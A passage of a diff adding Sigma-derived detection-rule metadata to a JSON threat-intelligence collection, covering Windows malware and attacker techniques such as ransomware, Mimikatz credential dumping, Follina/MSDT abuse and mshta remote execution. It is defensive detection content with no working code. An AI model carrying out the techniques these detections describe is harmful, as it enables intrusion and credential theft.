"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_dtrack.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ], + "creation_date": "2019/10/30", + "filename": "proc_creation_win_malware_dtrack.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects all Emotet like process executions 
that are not covered by the more generic rules", + "uuid": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", + "value": "Emotet Process Creation", + "meta": { + "refs": [ + "https://app.any.run/tasks/e13ab713-64cf-4b23-ad93-6dceaa5429ac/", + "https://app.any.run/tasks/81f3c28c-c686-425d-8a2b-a98198d244e1/", + "https://app.any.run/tasks/97f875e8-0e08-4328-815f-055e971ba754/", + "https://app.any.run/tasks/84fc9b4a-ea2b-47b1-8aa6-9014402dfb56/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_emotet.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" + ], + "creation_date": "2019/09/30", + "filename": "proc_creation_win_malware_emotet.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. 
We avoid false positives by excluding all parent process with command line parameters.", + "uuid": "032f5fb3-d959-41a5-9263-4173c802dc2b", + "value": "Formbook Process Creation", + "meta": { + "refs": [ + "https://inquest.net/blog/2018/06/22/a-look-at-formbook-stealer", + "https://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/", + "https://app.any.run/tasks/8e22486b-5edc-4cef-821c-373e945f296c/", + "https://app.any.run/tasks/62bb01ae-25a4-4180-b278-8e464a90b8d7/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_formbook.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587.001" + ], + "creation_date": "2019/09/30", + "filename": "proc_creation_win_malware_formbook.yml", + "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and windows eventlogs are cleared using wevtutil", + "uuid": "79aeeb41-8156-4fac-a0cd-076495ab82a1", + "value": "NotPetya Ransomware Activity", + "meta": { + "refs": [ + "https://securelist.com/schroedingers-petya/78870/", + "https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_notpetya.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011", + "attack.t1070.001", + "attack.credential_access", + "attack.t1003.001", + "car.2016-04-002" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_malware_notpetya.yml", + "author": "Florian Roth, Tom Ueltschi", + "level": "critical", + "falsepositive": [ + "Admin activity" + ], + 
"logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects QBot like process executions", + "uuid": "4fcac6eb-0287-4090-8eea-2602e4c20040", + "value": "QBot Process Creation", + "meta": { + "refs": [ + "https://twitter.com/killamjr/status/1179034907932315648", + "https://app.any.run/tasks/2e0647b7-eb86-4f72-904b-d2d0ecac07d1/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_qbot.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005" + ], + "creation_date": "2019/10/01", + "filename": "proc_creation_win_malware_qbot.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Ryuk ransomware activity", + "uuid": "c37510b8-2107-4b78-aa32-72f251e7a844", + "value": "Ryuk Ransomware", + "meta": { + "refs": [ + "https://app.any.run/tasks/d860402c-3ff4-4c1f-b367-0237da714ed1/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_ryuk.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2019/12/16", + "filename": "proc_creation_win_malware_ryuk.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects wscript/cscript executions of scripts located in user directories", + "uuid": "cea72823-df4d-4567-950c-0b579eaf0846", + "value": "WScript or CScript Dropper", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_script_dropper.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" + ], + "creation_date": "2019/01/16", + "filename": 
"proc_creation_win_malware_script_dropper.yml", + "author": "Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community", + "level": "high", + "falsepositive": [ + "Winzip", + "Other self-extractors" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes. This detectors attempts to identify that activity based off a command rarely observed in an enterprise network.", + "uuid": "410ad193-a728-4107-bc79-4419789fcbf8", + "value": "Trickbot Malware Recon Activity", + "meta": { + "refs": [ + "https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/", + "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_trickbot_recon_activity.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1482" + ], + "creation_date": "2019/12/28", + "filename": "proc_creation_win_malware_trickbot_recon_activity.yml", + "author": "David Burkett, Florian Roth", + "level": "critical", + "falsepositive": [ + "Rare System Admin Activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Trickbot malware process tree pattern in which rundll32.exe is parent of wermgr.exe", + "uuid": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", + "value": "Trickbot Malware Activity", + "meta": { + "refs": [ + "https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20", + "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_trickbot_wermgr.yml" + ], + "tags": [ + "attack.execution", + "attack.t1559" + ], + "creation_date": "2020/11/26", + "filename": "proc_creation_win_malware_trickbot_wermgr.yml", + "author": "Florian Roth", + "level": 
"high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects WannaCry ransomware activity", + "uuid": "41d40bff-377a-43e2-8e1b-2e543069e079", + "value": "WannaCry Ransomware", + "meta": { + "refs": [ + "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_wannacry.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1210", + "attack.discovery", + "attack.t1083", + "attack.defense_evasion", + "attack.t1222.001", + "attack.impact", + "attack.t1486", + "attack.t1490" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_malware_wannacry.yml", + "author": "Florian Roth (rule), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "uuid": "1fac1481-2dbc-48b2-9096-753c49b4ec71", + "value": "Adwind RAT / JRAT", + "meta": { + "refs": [ + "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", + "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_adwind.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" + ], + "creation_date": "2017/11/10", + "filename": "proc_creation_win_mal_adwind.yml", + "author": "Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "level": "high", + "falsepositive": "No established falsepositives", + 
"logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Attempts to detect system changes made by Blue Mockingbird", + "uuid": "c3198a27-23a0-4c2c-af19-e5328d49680e", + "value": "Blue Mockingbird", + "meta": { + "refs": [ + "https://redcanary.com/blog/blue-mockingbird-cryptominer/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_blue_mockingbird.yml" + ], + "tags": [ + "attack.execution", + "attack.t1112", + "attack.t1047" + ], + "creation_date": "2020/05/14", + "filename": "proc_creation_win_mal_blue_mockingbird.yml", + "author": "Trent Liffick (@tliffick)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects DarkSide Ransomware and helpers", + "uuid": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", + "value": "DarkSide Ransomware Pattern", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", + "https://app.any.run/tasks/8b9a571b-bcc1-4783-ba32-df4ba623b9c0/", + "https://www.joesandbox.com/analysis/411752/0/html#7048BB9A06B8F2DD9D24C77F389D7B2B58D2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_darkside_ransomware.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204" + ], + "creation_date": "2021/05/14", + "filename": "proc_creation_win_mal_darkside_ransomware.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown", + "UAC bypass method used by other malware" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022", + "uuid": "2f974656-6d83-4059-bbdf-68ac5403422f", + "value": "Hermetic 
Wiper TG Process Patterns", + "meta": { + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_hermetic_wiper_activity.yml" + ], + "tags": [ + "attack.execution", + "attack.lateral_movement", + "attack.t1021.001" + ], + "creation_date": "2022/02/25", + "filename": "proc_creation_win_mal_hermetic_wiper_activity.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects LockerGoga Ransomware command line.", + "uuid": "74db3488-fd28-480a-95aa-b7af626de068", + "value": "LockerGoga Ransomware", + "meta": { + "refs": [ + "https://medium.com/@malwaredancer/lockergoga-input-arguments-ipc-communication-and-others-bd4e5a7ba80a", + "https://blog.f-secure.com/analysis-of-lockergoga-ransomware/", + "https://www.carbonblack.com/blog/tau-threat-intelligence-notification-lockergoga-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_lockergoga_ransomware.yml" + ], + "tags": [ + "attack.impact", + "attack.t1486" + ], + "creation_date": "2020/10/18", + "filename": "proc_creation_win_mal_lockergoga_ransomware.yml", + "author": "Vasiliy Burov, oscd.community", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Ryuk Ransomware command lines", + "uuid": "0acaad27-9f02-4136-a243-c357202edd74", + "value": "Ryuk Ransomware Command Line Activity", + "meta": { + "refs": [ + "https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_ryuk.yml" + ], + "tags": [ + "attack.execution", + 
"attack.t1204" + ], + "creation_date": "2019/08/06", + "filename": "proc_creation_win_mal_ryuk.yml", + "author": "Vasiliy Burov", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a usage of the manage-bde.wsf script that may indicate an attempt of proxy execution from script", + "uuid": "c363385c-f75d-4753-a108-c1a8e28bdbda", + "value": "Suspicious Usage of the Manage-bde.wsf Script", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/", + "https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712", + "https://twitter.com/bohops/status/980659399495741441", + "https://twitter.com/JohnLaTwC/status/1223292479270600706", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_manage_bde_lolbas.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ], + "creation_date": "2020/10/13", + "filename": "proc_creation_win_manage_bde_lolbas.yml", + "author": "oscd.community, Natalia Shornikova", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", + "uuid": "15619216-e993-4721-b590-4c520615a67d", + "value": "Meterpreter or Cobalt Strike Getsystem Service Start", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml" + ], + 
"tags": [ + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" + ], + "creation_date": "2019/10/26", + "filename": "proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "level": "high", + "falsepositive": [ + "Commandlines containing components like cmd accidentally", + "Jobs and services started with cmd" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detection well-known mimikatz command line arguments", + "uuid": "a642964e-bead-4bed-8910-1bb4d63e3b4d", + "value": "Mimikatz Command Line", + "meta": { + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://tools.thehacker.recipes/mimikatz/modules", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mimikatz_command_line.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006" + ], + "creation_date": "2019/10/22", + "filename": "proc_creation_win_mimikatz_command_line.yml", + "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", + "level": "medium", + "falsepositive": [ + "Legitimate Administrator using tool for password recovery" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", + "uuid": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", + "value": "MMC20 Lateral Movement", + "meta": { + "refs": [ + "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/", + 
"https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mmc20_lateral_movement.yml" + ], + "tags": [ + "attack.execution", + "attack.t1021.003" + ], + "creation_date": "2020/03/04", + "filename": "proc_creation_win_mmc20_lateral_movement.yml", + "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a Windows command line executable started from MMC", + "uuid": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", + "value": "MMC Spawning Windows Shell", + "meta": { + "refs": [ + "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mmc_spawn_shell.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.003" + ], + "creation_date": "2019/08/05", + "filename": "proc_creation_win_mmc_spawn_shell.yml", + "author": "Karneades, Swisscom CSIRT", + "level": "high", + "falsepositive": "No established falsepositives", + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", + "uuid": "ada4b0c4-758b-46ac-9033-9004613a150d", + "value": "Modify Group Policy Settings", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_modify_group_policy_settings.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1484.001" + ], + "creation_date": 
"2022/08/19", + "filename": "proc_creation_win_modify_group_policy_settings.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects modification of an existing service on a compromised host in order to execute an arbitrary payload when the service is started or killed as a method of persistence.", + "uuid": "38879043-7e1e-47a9-8d46-6bec88e201df", + "value": "Modification Of Existing Services For Persistence", + "meta": { + "refs": [ + "https://pentestlab.blog/2020/01/22/persistence-modify-existing-service/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_modif_of_services_for_via_commandline.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1543.003", + "attack.t1574.011" + ], + "creation_date": "2020/09/29", + "filename": "proc_creation_win_modif_of_services_for_via_commandline.yml", + "author": "Sreeman", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. When the job runs on the system the command specified in the BITS job will be executed. This can be abused by actors to create a backdoor within the system and for persistence. 
It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded", + "uuid": "b9cbbc17-d00d-4e3d-a827-b06d03d2380d", + "value": "Monitoring For Persistence Via BITS", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html", + "https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_monitoring_for_persistence_via_bits.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1197" + ], + "creation_date": "2020/10/29", + "filename": "proc_creation_win_monitoring_for_persistence_via_bits.yml", + "author": "Sreeman", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool \"Mouse Lock\" as being used for both credential access and collection in security incidents.", + "uuid": "c9192ad9-75e5-43eb-8647-82a0a5b493e3", + "value": "Mouse Lock Credential Gathering", + "meta": { + "refs": [ + "https://github.com/klsecservices/Publications/blob/657deb6a6eb6e00669afd40173f425fb49682eaa/Incident-Response-Analyst-Report-2020.pdf", + "https://sourceforge.net/projects/mouselock/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mouse_lock.yml" + ], + "tags": [ + "attack.credential_access", + "attack.collection", + "attack.t1056.002" + ], + "creation_date": "2020/08/13", + "filename": "proc_creation_win_mouse_lock.yml", + "author": "Cian Heasley", + "level": "medium", + "falsepositive": [ + "Legitimate uses of Mouse Lock software" + ], + "logsource.category": "process_creation", 
+ "logsource.product": "windows" + } + }, + { + "description": "Detects file execution using the msdeploy.exe lolbin", + "uuid": "646bc99f-6682-4b47-a73a-17b1b64c9d34", + "value": "Execute Files with Msdeploy.exe", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/", + "https://twitter.com/pabraeken/status/995837734379032576", + "https://twitter.com/pabraeken/status/999090532839313408", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdeploy.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ], + "creation_date": "2020/10/18", + "filename": "proc_creation_win_msdeploy.yml", + "author": "Beyu Denis, oscd.community", + "level": "medium", + "falsepositive": [ + "System administrator Usage" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", + "uuid": "258fc8ce-8352-443a-9120-8a11e4857fa5", + "value": "Execute Arbitrary Commands Using MSDT.EXE", + "meta": { + "refs": [ + "https://twitter.com/nao_sec/status/1530196847679401984", + "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", + "https://twitter.com/_JohnHammond/status/1531672601067675648", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ], + "creation_date": "2022/05/29", + "filename": "proc_creation_win_msdt.yml", + "author": "Nasreddine Bencherchali (rule)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects diagcab leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in 
CVE-2022-30190", + "uuid": "6545ce61-a1bd-4119-b9be-fcbee42c0cf3", + "value": "Execute MSDT.EXE Using Diagcab File", + "meta": { + "refs": [ + "https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab", + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0", + "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_diagcab.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ], + "creation_date": "2022/06/09", + "filename": "proc_creation_win_msdt_diagcab.yml", + "author": "GossiTheDog (rule), frack113 (sigma version)", + "level": "high", + "falsepositive": [ + "Legitimate usage of \".diagcab\" files" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of msdt.exe using the \"cab\" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190", + "uuid": "dc4576d4-7467-424f-9eee-fd2b02855fe0", + "value": "MSDT.EXE Execution With Suspicious Cab Option", + "meta": { + "refs": [ + "https://twitter.com/nas_bench/status/1537896324837781506", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_susp_cab_options.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ], + "creation_date": "2022/06/21", + "filename": "proc_creation_win_msdt_susp_cab_options.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate usage of \".diagcab\" files" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects msdt.exe executed by a suspicious parent as seen in 
CVE-2022-30190 / Follina exploitation", + "uuid": "7a74da6b-ea76-47db-92cc-874ad90df734", + "value": "MSDT Executed with Suspicious Parent", + "meta": { + "refs": [ + "https://twitter.com/nao_sec/status/1530196847679401984", + "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_susp_parent.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1218" + ], + "creation_date": "2022/06/01", + "filename": "proc_creation_win_msdt_susp_parent.yml", + "author": "Nextron Systems", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the suspicious minimized start of MsEdge browser, which can be used to download files from the Internet", + "uuid": "94771a71-ba41-4b6e-a757-b531372eaab6", + "value": "Suspicious Minimized MSEdge Start", + "meta": { + "refs": [ + "https://twitter.com/mrd0x/status/1478234484881436672?s=12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msedge_minimized_download.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2022/01/11", + "filename": "proc_creation_win_msedge_minimized_download.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Software that uses MsEdge to download components in the background (see ParentImage, ParentCommandLine)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", + "uuid": "b98d0db6-511d-45de-ad02-e82a98729620", + "value": "Mshta Remotely Hosted HTA File Execution", + "meta": { + "refs": [ + 
"https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_http.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218.005" + ], + "creation_date": "2022/08/08", + "filename": "proc_creation_win_mshta_http.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Identifies suspicious mshta.exe commands.", + "uuid": "67f113fa-e23d-4271-befa-30113b3e08b1", + "value": "Mshta JavaScript Execution", + "meta": { + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/6bc283c4-21f2-4aed-a05c-a9a3ffa95dd4.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.005/T1218.005.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.005" + ], + "creation_date": "2019/10/24", + "filename": "proc_creation_win_mshta_javascript.yml", + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a Windows command line executable started from MSHTA", + "uuid": "03cc0c25-389f-4bf8-b48d-11878079f1ca", + "value": "MSHTA Spawning Windows Shell", + "meta": { + "refs": [ + "https://www.trustedsec.com/july-2015/malicious-htas/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_spawn_shell.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.005", + "car.2013-02-003", + "car.2013-03-001", + "car.2014-04-003" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_mshta_spawn_shell.yml", + "author": "Michael Haag", + "level": "high", + "falsepositive": [ + "Printer software / driver installations", + "HP software" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects MsiExec loading a DLL and calling its DllUnregisterServer function", + "uuid": "84f52741-8834-4a8c-a413-2eb2269aa6c8", + "value": "Suspicious Msiexec Load DLL", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", + "https://twitter.com/_st0pp3r_/status/1583914515996897281", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_dll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.007" + ], + "creation_date": "2022/04/24", + "filename": "proc_creation_win_msiexec_dll.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": 
